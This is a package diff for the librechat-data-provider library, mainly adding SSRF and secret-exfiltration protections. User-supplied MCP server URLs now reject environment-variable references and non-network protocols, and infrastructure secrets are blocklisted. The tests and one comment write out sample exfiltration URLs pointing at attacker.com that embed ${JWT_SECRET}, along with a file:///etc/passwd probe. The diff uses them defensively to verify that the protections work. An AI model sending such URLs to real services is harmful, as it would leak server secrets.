librechat-data-provider 0.8.302 → 0.8.401

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "librechat-data-provider",
-  "version": "0.8.302",
+  "version": "0.8.401",
   "description": "data services for librechat apps",
   "main": "dist/index.js",
   "module": "dist/index.es.js",

package/specs/mcp.spec.ts

@@ -0,0 +1,147 @@
+import { SSEOptionsSchema, MCPServerUserInputSchema } from '../src/mcp';
+
+describe('MCPServerUserInputSchema', () => {
+  describe('env variable exfiltration prevention', () => {
+    it('should confirm admin schema resolves env vars (attack vector baseline)', () => {
+      process.env.FAKE_SECRET = 'leaked-secret-value';
+      const adminResult = SSEOptionsSchema.safeParse({
+        type: 'sse',
+        url: 'http://attacker.com/?secret=${FAKE_SECRET}',
+      });
+      expect(adminResult.success).toBe(true);
+      if (adminResult.success) {
+        expect(adminResult.data.url).toContain('leaked-secret-value');
+      }
+      delete process.env.FAKE_SECRET;
+    });
+
+    it('should reject the same URL through user input schema', () => {
+      process.env.FAKE_SECRET = 'leaked-secret-value';
+      const userResult = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'http://attacker.com/?secret=${FAKE_SECRET}',
+      });
+      expect(userResult.success).toBe(false);
+      delete process.env.FAKE_SECRET;
+    });
+  });
+
+  describe('env variable rejection', () => {
+    it('should reject SSE URLs containing env variable patterns', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'http://attacker.com/?secret=${FAKE_SECRET}',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject streamable-http URLs containing env variable patterns', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'streamable-http',
+        url: 'http://attacker.com/?jwt=${JWT_SECRET}',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject WebSocket URLs containing env variable patterns', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'websocket',
+        url: 'ws://attacker.com/?secret=${FAKE_SECRET}',
+      });
+      expect(result.success).toBe(false);
+    });
+  });
+
+  describe('protocol allowlisting', () => {
+    it('should reject file:// URLs for SSE', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'file:///etc/passwd',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject ftp:// URLs for streamable-http', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'streamable-http',
+        url: 'ftp://internal-server/data',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject http:// URLs for WebSocket', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'websocket',
+        url: 'http://example.com/ws',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject ws:// URLs for SSE', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'ws://example.com/sse',
+      });
+      expect(result.success).toBe(false);
+    });
+  });
+
+  describe('valid URL acceptance', () => {
+    it('should accept valid https:// SSE URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'https://mcp-server.com/sse',
+      });
+      expect(result.success).toBe(true);
+      if (result.success) {
+        expect(result.data.url).toBe('https://mcp-server.com/sse');
+      }
+    });
+
+    it('should accept valid http:// SSE URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'http://mcp-server.com/sse',
+      });
+      expect(result.success).toBe(true);
+    });
+
+    it('should accept valid wss:// WebSocket URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'websocket',
+        url: 'wss://mcp-server.com/ws',
+      });
+      expect(result.success).toBe(true);
+      if (result.success) {
+        expect(result.data.url).toBe('wss://mcp-server.com/ws');
+      }
+    });
+
+    it('should accept valid ws:// WebSocket URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'websocket',
+        url: 'ws://mcp-server.com/ws',
+      });
+      expect(result.success).toBe(true);
+    });
+
+    it('should accept valid https:// streamable-http URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'streamable-http',
+        url: 'https://mcp-server.com/http',
+      });
+      expect(result.success).toBe(true);
+      if (result.success) {
+        expect(result.data.url).toBe('https://mcp-server.com/http');
+      }
+    });
+
+    it('should accept valid http:// streamable-http URLs with "http" alias', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'http',
+        url: 'http://mcp-server.com/mcp',
+      });
+      expect(result.success).toBe(true);
+    });
+  });
+});

package/specs/utils.spec.ts

@@ -1,4 +1,4 @@
-import { extractEnvVariable } from '../src/utils';
+import { extractEnvVariable, isSensitiveEnvVar } from '../src/utils';
 
 describe('Environment Variable Extraction', () => {
   const originalEnv = process.env;
@@ -7,7 +7,7 @@ describe('Environment Variable Extraction', () => {
     process.env = {
       ...originalEnv,
       TEST_API_KEY: 'test-api-key-value',
-      ANOTHER_SECRET: 'another-secret-value',
+      ANOTHER_VALUE: 'another-value',
     };
   });
 
@@ -55,7 +55,7 @@ describe('Environment Variable Extraction', () => {
   describe('extractEnvVariable function', () => {
     it('should extract environment variables from exact matches', () => {
       expect(extractEnvVariable('${TEST_API_KEY}')).toBe('test-api-key-value');
-      expect(extractEnvVariable('${ANOTHER_SECRET}')).toBe('another-secret-value');
+      expect(extractEnvVariable('${ANOTHER_VALUE}')).toBe('another-value');
     });
 
     it('should extract environment variables from strings with prefixes', () => {
@@ -82,7 +82,7 @@ describe('Environment Variable Extraction', () => {
   describe('extractEnvVariable', () => {
     it('should extract environment variable values', () => {
       expect(extractEnvVariable('${TEST_API_KEY}')).toBe('test-api-key-value');
-      expect(extractEnvVariable('${ANOTHER_SECRET}')).toBe('another-secret-value');
+      expect(extractEnvVariable('${ANOTHER_VALUE}')).toBe('another-value');
     });
 
     it('should return the original string if environment variable is not found', () => {
@@ -126,4 +126,71 @@ describe('Environment Variable Extraction', () => {
       );
     });
   });
+
+  describe('isSensitiveEnvVar', () => {
+    it('should flag infrastructure secrets', () => {
+      expect(isSensitiveEnvVar('JWT_SECRET')).toBe(true);
+      expect(isSensitiveEnvVar('JWT_REFRESH_SECRET')).toBe(true);
+      expect(isSensitiveEnvVar('CREDS_KEY')).toBe(true);
+      expect(isSensitiveEnvVar('CREDS_IV')).toBe(true);
+      expect(isSensitiveEnvVar('MEILI_MASTER_KEY')).toBe(true);
+      expect(isSensitiveEnvVar('MONGO_URI')).toBe(true);
+      expect(isSensitiveEnvVar('REDIS_URI')).toBe(true);
+      expect(isSensitiveEnvVar('REDIS_PASSWORD')).toBe(true);
+    });
+
+    it('should allow non-infrastructure vars through (including operator-configured secrets)', () => {
+      expect(isSensitiveEnvVar('OPENAI_API_KEY')).toBe(false);
+      expect(isSensitiveEnvVar('ANTHROPIC_API_KEY')).toBe(false);
+      expect(isSensitiveEnvVar('GOOGLE_KEY')).toBe(false);
+      expect(isSensitiveEnvVar('PROXY')).toBe(false);
+      expect(isSensitiveEnvVar('DEBUG_LOGGING')).toBe(false);
+      expect(isSensitiveEnvVar('DOMAIN_CLIENT')).toBe(false);
+      expect(isSensitiveEnvVar('APP_TITLE')).toBe(false);
+      expect(isSensitiveEnvVar('OPENID_CLIENT_SECRET')).toBe(false);
+      expect(isSensitiveEnvVar('DISCORD_CLIENT_SECRET')).toBe(false);
+      expect(isSensitiveEnvVar('MY_CUSTOM_SECRET')).toBe(false);
+    });
+  });
+
+  describe('extractEnvVariable sensitive var blocklist', () => {
+    beforeEach(() => {
+      process.env.JWT_SECRET = 'super-secret-jwt';
+      process.env.JWT_REFRESH_SECRET = 'super-secret-refresh';
+      process.env.CREDS_KEY = 'encryption-key';
+      process.env.CREDS_IV = 'encryption-iv';
+      process.env.MEILI_MASTER_KEY = 'meili-key';
+      process.env.MONGO_URI = 'mongodb://user:pass@host/db';
+      process.env.REDIS_URI = 'redis://:pass@host:6379';
+      process.env.REDIS_PASSWORD = 'redis-pass';
+      process.env.OPENAI_API_KEY = 'sk-legit-key';
+    });
+
+    it('should refuse to resolve sensitive vars (single-match path)', () => {
+      expect(extractEnvVariable('${JWT_SECRET}')).toBe('${JWT_SECRET}');
+      expect(extractEnvVariable('${JWT_REFRESH_SECRET}')).toBe('${JWT_REFRESH_SECRET}');
+      expect(extractEnvVariable('${CREDS_KEY}')).toBe('${CREDS_KEY}');
+      expect(extractEnvVariable('${CREDS_IV}')).toBe('${CREDS_IV}');
+      expect(extractEnvVariable('${MEILI_MASTER_KEY}')).toBe('${MEILI_MASTER_KEY}');
+      expect(extractEnvVariable('${MONGO_URI}')).toBe('${MONGO_URI}');
+      expect(extractEnvVariable('${REDIS_URI}')).toBe('${REDIS_URI}');
+      expect(extractEnvVariable('${REDIS_PASSWORD}')).toBe('${REDIS_PASSWORD}');
+    });
+
+    it('should refuse to resolve sensitive vars in composite strings (multi-match path)', () => {
+      expect(extractEnvVariable('key=${JWT_SECRET}&more')).toBe('key=${JWT_SECRET}&more');
+      expect(extractEnvVariable('db=${MONGO_URI}/extra')).toBe('db=${MONGO_URI}/extra');
+    });
+
+    it('should still resolve non-sensitive vars normally', () => {
+      expect(extractEnvVariable('${OPENAI_API_KEY}')).toBe('sk-legit-key');
+      expect(extractEnvVariable('Bearer ${OPENAI_API_KEY}')).toBe('Bearer sk-legit-key');
+    });
+
+    it('should resolve non-sensitive vars while blocking sensitive ones in the same string', () => {
+      expect(extractEnvVariable('key=${OPENAI_API_KEY}&secret=${JWT_SECRET}')).toBe(
+        'key=sk-legit-key&secret=${JWT_SECRET}',
+      );
+    });
+  });
 });

package/src/accessPermissions.ts

@@ -200,9 +200,9 @@ export type TUpdateResourcePermissionsResponse = z.infer<
  * Principal search request parameters
  */
 export type TPrincipalSearchParams = {
-  q: string; // search query (required)
-  limit?: number; // max results (1-50, default 10)
-  type?: PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE; // filter by type (optional)
+  q: string;
+  limit?: number;
+  types?: Array<PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE>;
 };
 
 /**
@@ -228,7 +228,7 @@ export type TPrincipalSearchResult = {
 export type TPrincipalSearchResponse = {
   query: string;
   limit: number;
-  type?: PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE;
+  types?: Array<PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE> | null;
   results: TPrincipalSearchResult[];
   count: number;
   sources: {

package/src/config.ts

@@ -1560,6 +1560,10 @@ export enum ErrorTypes {
    * No Base URL Provided.
    */
   NO_BASE_URL = 'no_base_url',
+  /**
+   * Base URL targets a restricted or invalid address (SSRF protection).
+   */
+  INVALID_BASE_URL = 'invalid_base_url',
   /**
    * Moderation error
    */
@@ -1612,6 +1616,10 @@ export enum ErrorTypes {
    * Model refused to respond (content policy violation)
    */
   REFUSAL = 'refusal',
+  /**
+   * SSE stream 404 — job completed, expired, or was deleted before the subscriber connected
+   */
+  STREAM_EXPIRED = 'stream_expired',
 }
 
 /**
@@ -1736,7 +1744,7 @@ export enum TTSProviders {
 /** Enum for app-wide constants */
 export enum Constants {
   /** Key for the app's version. */
-  VERSION = 'v0.8.3',
+  VERSION = 'v0.8.4',
   /** Key for the Custom Config's version (librechat.yaml). */
   CONFIG_VERSION = '1.3.6',
   /** Standard value for the first message's `parentMessageId` value, to indicate no parent exists. */

package/src/data-service.ts

@@ -21,8 +21,8 @@ export function revokeAllUserKeys(): Promise<unknown> {
   return request.delete(endpoints.revokeAllUserKeys());
 }
 
-export function deleteUser(): Promise<s.TPreset> {
-  return request.delete(endpoints.deleteUser());
+export function deleteUser(payload?: t.TDeleteUserRequest): Promise<unknown> {
+  return request.deleteWithOptions(endpoints.deleteUser(), { data: payload });
 }
 
 export type FavoriteItem = {
@@ -970,8 +970,8 @@ export function updateFeedback(
 }
 
 // 2FA
-export function enableTwoFactor(): Promise<t.TEnable2FAResponse> {
-  return request.get(endpoints.enableTwoFactor());
+export function enableTwoFactor(payload?: t.TEnable2FARequest): Promise<t.TEnable2FAResponse> {
+  return request.post(endpoints.enableTwoFactor(), payload);
 }
 
 export function verifyTwoFactor(payload: t.TVerify2FARequest): Promise<t.TVerify2FAResponse> {
@@ -986,8 +986,10 @@ export function disableTwoFactor(payload?: t.TDisable2FARequest): Promise<t.TDis
   return request.post(endpoints.disableTwoFactor(), payload);
 }
 
-export function regenerateBackupCodes(): Promise<t.TRegenerateBackupCodesResponse> {
-  return request.post(endpoints.regenerateBackupCodes());
+export function regenerateBackupCodes(
+  payload?: t.TRegenerateBackupCodesRequest,
+): Promise<t.TRegenerateBackupCodesResponse> {
+  return request.post(endpoints.regenerateBackupCodes(), payload);
 }
 
 export function verifyTwoFactorTemp(

package/src/file-config.spec.ts

@@ -1,15 +1,53 @@
 import type { FileConfig } from './types/files';
 import {
   fileConfig as baseFileConfig,
+  documentParserMimeTypes,
   getEndpointFileConfig,
-  mergeFileConfig,
   applicationMimeTypes,
   defaultOCRMimeTypes,
-  documentParserMimeTypes,
   supportedMimeTypes,
+  mergeFileConfig,
+  inferMimeType,
+  textMimeTypes,
 } from './file-config';
 import { EModelEndpoint } from './schemas';
 
+describe('inferMimeType', () => {
+  it('should normalize text/x-python-script to text/x-python', () => {
+    expect(inferMimeType('test.py', 'text/x-python-script')).toBe('text/x-python');
+  });
+
+  it('should return a type that matches textMimeTypes after normalization', () => {
+    const normalized = inferMimeType('test.py', 'text/x-python-script');
+    expect(textMimeTypes.test(normalized)).toBe(true);
+  });
+
+  it('should pass through standard browser types unchanged', () => {
+    expect(inferMimeType('test.py', 'text/x-python')).toBe('text/x-python');
+    expect(inferMimeType('doc.pdf', 'application/pdf')).toBe('application/pdf');
+  });
+
+  it('should infer from extension when browser type is empty', () => {
+    expect(inferMimeType('test.py', '')).toBe('text/x-python');
+    expect(inferMimeType('code.js', '')).toBe('text/javascript');
+    expect(inferMimeType('photo.heic', '')).toBe('image/heic');
+    expect(inferMimeType('Main.java', '')).toBe('text/x-java');
+  });
+
+  it('should return empty string for unknown extension with no browser type', () => {
+    expect(inferMimeType('file.xyz', '')).toBe('');
+  });
+
+  it('should produce a type accepted by checkType after normalizing text/x-python-script', () => {
+    const normalized = inferMimeType('test.py', 'text/x-python-script');
+    expect(baseFileConfig.checkType(normalized)).toBe(true);
+  });
+
+  it('should reject raw text/x-python-script without normalization', () => {
+    expect(baseFileConfig.checkType('text/x-python-script')).toBe(false);
+  });
+});
+
 describe('applicationMimeTypes', () => {
   const odfTypes = [
     'application/vnd.oasis.opendocument.text',
@@ -104,12 +142,12 @@ describe('documentParserMimeTypes', () => {
     'application/x-msexcel',
     'application/x-ms-excel',
     'application/vnd.oasis.opendocument.spreadsheet',
+    'application/vnd.oasis.opendocument.text',
   ])('matches natively parseable type: %s', (mimeType) => {
     expect(check(mimeType)).toBe(true);
   });
 
   it.each([
-    'application/vnd.oasis.opendocument.text',
     'application/vnd.oasis.opendocument.presentation',
     'application/vnd.oasis.opendocument.graphics',
     'text/plain',

package/src/file-config.ts

@@ -202,12 +202,13 @@ export const defaultOCRMimeTypes = [
   /^application\/vnd\.oasis\.opendocument\.(text|spreadsheet|presentation|graphics)$/,
 ];
 
-/** MIME types handled by the built-in document parser (pdf, docx, excel variants, ods) */
+/** MIME types handled by the built-in document parser (pdf, docx, excel variants, ods/odt) */
 export const documentParserMimeTypes = [
   excelMimeTypes,
   /^application\/pdf$/,
   /^application\/vnd\.openxmlformats-officedocument\.wordprocessingml\.document$/,
   /^application\/vnd\.oasis\.opendocument\.spreadsheet$/,
+  /^application\/vnd\.oasis\.opendocument\.text$/,
 ];
 
 export const defaultTextMimeTypes = [/^[\w.-]+\/[\w.-]+$/];
@@ -242,6 +243,7 @@ export const codeTypeMapping: { [key: string]: string } = {
   py: 'text/x-python', // .py - Python source
   rb: 'text/x-ruby', // .rb - Ruby source
   tex: 'text/x-tex', // .tex - LaTeX source
+  java: 'text/x-java', // .java - Java source
   js: 'text/javascript', // .js - JavaScript source
   sh: 'application/x-sh', // .sh - Shell script
   ts: 'application/typescript', // .ts - TypeScript source
@@ -357,15 +359,21 @@ export const imageTypeMapping: { [key: string]: string } = {
   heif: 'image/heif',
 };
 
+/** Normalizes non-standard MIME types that browsers may report to their canonical forms */
+export const mimeTypeAliases: Readonly<Record<string, string>> = {
+  'text/x-python-script': 'text/x-python',
+};
+
 /**
- * Infers the MIME type from a file's extension when the browser doesn't recognize it
- * @param fileName - The name of the file including extension
- * @param currentType - The current MIME type reported by the browser (may be empty)
- * @returns The inferred MIME type if browser didn't provide one, otherwise the original type
+ * Infers the MIME type from a file's extension when the browser doesn't recognize it,
+ * and normalizes known non-standard MIME type aliases to their canonical forms.
+ * @param fileName - The file name including its extension
+ * @param currentType - The MIME type reported by the browser (may be empty string)
+ * @returns The normalized or inferred MIME type; empty string if unresolvable
  */
 export function inferMimeType(fileName: string, currentType: string): string {
   if (currentType) {
-    return currentType;
+    return mimeTypeAliases[currentType] ?? currentType;
   }
 
   const extension = fileName.split('.').pop()?.toLowerCase() ?? '';

package/src/mcp.ts

@@ -223,6 +223,23 @@ const omitServerManagedFields = <T extends z.ZodObject<z.ZodRawShape>>(schema: T
     oauth_headers: true,
   });
 
+const envVarPattern = /\$\{[^}]+\}/;
+const isWsProtocol = (val: string): boolean => /^wss?:/i.test(val);
+const isHttpProtocol = (val: string): boolean => /^https?:/i.test(val);
+
+/**
+ * Builds a URL schema for user input that rejects ${VAR} env variable patterns
+ * and validates protocol constraints without resolving environment variables.
+ */
+const userUrlSchema = (protocolCheck: (val: string) => boolean, message: string) =>
+  z
+    .string()
+    .refine((val) => !envVarPattern.test(val), {
+      message: 'Environment variable references are not allowed in URLs',
+    })
+    .pipe(z.string().url())
+    .refine(protocolCheck, { message });
+
 /**
  * MCP Server configuration that comes from UI/API input only.
  * Omits server-managed fields like startup, timeout, customUserVars, etc.
@@ -232,11 +249,23 @@ const omitServerManagedFields = <T extends z.ZodObject<z.ZodRawShape>>(schema: T
  * Stdio allows arbitrary command execution and should only be configured
  * by administrators via the YAML config file (librechat.yaml).
  * Only remote transports (SSE, HTTP, WebSocket) are allowed via the API.
+ *
+ * SECURITY: URL fields use userUrlSchema instead of the admin schemas'
+ * extractEnvVariable transform to prevent env variable exfiltration
+ * through user-controlled URLs (e.g. http://attacker.com/?k=${JWT_SECRET}).
+ * Protocol checks use positive allowlists (http(s) / ws(s)) to block
+ * file://, ftp://, javascript:, and other non-network schemes.
  */
 export const MCPServerUserInputSchema = z.union([
-  omitServerManagedFields(WebSocketOptionsSchema),
-  omitServerManagedFields(SSEOptionsSchema),
-  omitServerManagedFields(StreamableHTTPOptionsSchema),
+  omitServerManagedFields(WebSocketOptionsSchema).extend({
+    url: userUrlSchema(isWsProtocol, 'WebSocket URL must use ws:// or wss://'),
+  }),
+  omitServerManagedFields(SSEOptionsSchema).extend({
+    url: userUrlSchema(isHttpProtocol, 'SSE URL must use http:// or https://'),
+  }),
+  omitServerManagedFields(StreamableHTTPOptionsSchema).extend({
+    url: userUrlSchema(isHttpProtocol, 'Streamable HTTP URL must use http:// or https://'),
+  }),
 ]);
 
 export type MCPServerUserInput = z.infer<typeof MCPServerUserInputSchema>;

package/src/roles.spec.ts

@@ -0,0 +1,132 @@
+import { Permissions, PermissionTypes, permissionsSchema } from './permissions';
+import { SystemRoles, roleDefaults } from './roles';
+
+const RESOURCE_MANAGEMENT_FIELDS: Permissions[] = [
+  Permissions.CREATE,
+  Permissions.SHARE,
+  Permissions.SHARE_PUBLIC,
+];
+
+/**
+ * Permission types where CREATE/SHARE/SHARE_PUBLIC must default to false for USER.
+ * MEMORIES is excluded: its CREATE/READ/UPDATE apply to the user's own private data.
+ * AGENTS/PROMPTS are excluded: CREATE=true is intentional (users own their agents/prompts).
+ * Add new types here if they gate shared/multi-user resources.
+ */
+const RESOURCE_PERMISSION_TYPES: PermissionTypes[] = [
+  PermissionTypes.MCP_SERVERS,
+  PermissionTypes.REMOTE_AGENTS,
+];
+
+describe('roleDefaults', () => {
+  describe('USER role', () => {
+    const userPerms = roleDefaults[SystemRoles.USER].permissions;
+
+    it('should have explicit values for every field in every multi-field permission type', () => {
+      const schemaShape = permissionsSchema.shape;
+
+      for (const [permType, subSchema] of Object.entries(schemaShape)) {
+        const fieldNames = Object.keys(subSchema.shape);
+        if (fieldNames.length <= 1) {
+          continue;
+        }
+
+        const userValues =
+          userPerms[permType as PermissionTypes] as Record<string, boolean>;
+
+        for (const field of fieldNames) {
+          expect({
+            permType,
+            field,
+            value: userValues[field],
+          }).toEqual(
+            expect.objectContaining({
+              permType,
+              field,
+              value: expect.any(Boolean),
+            }),
+          );
+        }
+      }
+    });
+
+    it('should never grant CREATE, SHARE, or SHARE_PUBLIC by default for resource-management types', () => {
+      for (const permType of RESOURCE_PERMISSION_TYPES) {
+        const permissions = userPerms[permType] as Record<string, boolean>;
+        for (const field of RESOURCE_MANAGEMENT_FIELDS) {
+          if (permissions[field] === undefined) {
+            continue;
+          }
+          expect({
+            permType,
+            field,
+            value: permissions[field],
+          }).toEqual(
+            expect.objectContaining({
+              permType,
+              field,
+              value: false,
+            }),
+          );
+        }
+      }
+    });
+
+    it('should cover every permission type that has CREATE, SHARE, or SHARE_PUBLIC fields', () => {
+      const schemaShape = permissionsSchema.shape;
+      const restrictedSet = new Set<string>(RESOURCE_PERMISSION_TYPES);
+
+      for (const [permType, subSchema] of Object.entries(schemaShape)) {
+        const fieldNames = Object.keys(subSchema.shape);
+        const hasResourceFields = fieldNames.some((f) => RESOURCE_MANAGEMENT_FIELDS.includes(f as Permissions));
+        if (!hasResourceFields) {
+          continue;
+        }
+
+        const isTracked =
+          restrictedSet.has(permType) ||
+          permType === PermissionTypes.MEMORIES ||
+          permType === PermissionTypes.PROMPTS ||
+          permType === PermissionTypes.AGENTS;
+
+        expect({
+          permType,
+          tracked: isTracked,
+        }).toEqual(
+          expect.objectContaining({
+            permType,
+            tracked: true,
+          }),
+        );
+      }
+    });
+  });
+
+  describe('ADMIN role', () => {
+    const adminPerms = roleDefaults[SystemRoles.ADMIN].permissions;
+
+    it('should have explicit values for every field in every permission type', () => {
+      const schemaShape = permissionsSchema.shape;
+
+      for (const [permType, subSchema] of Object.entries(schemaShape)) {
+        const fieldNames = Object.keys(subSchema.shape);
+        const adminValues =
+          adminPerms[permType as PermissionTypes] as Record<string, boolean>;
+
+        for (const field of fieldNames) {
+          expect({
+            permType,
+            field,
+            value: adminValues[field],
+          }).toEqual(
+            expect.objectContaining({
+              permType,
+              field,
+              value: expect.any(Boolean),
+            }),
+          );
+        }
+      }
+    });
+  });
+});